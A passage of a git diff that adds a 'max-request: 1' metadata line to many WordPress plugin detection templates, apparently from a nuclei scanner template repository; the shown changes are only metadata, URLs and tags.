0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml 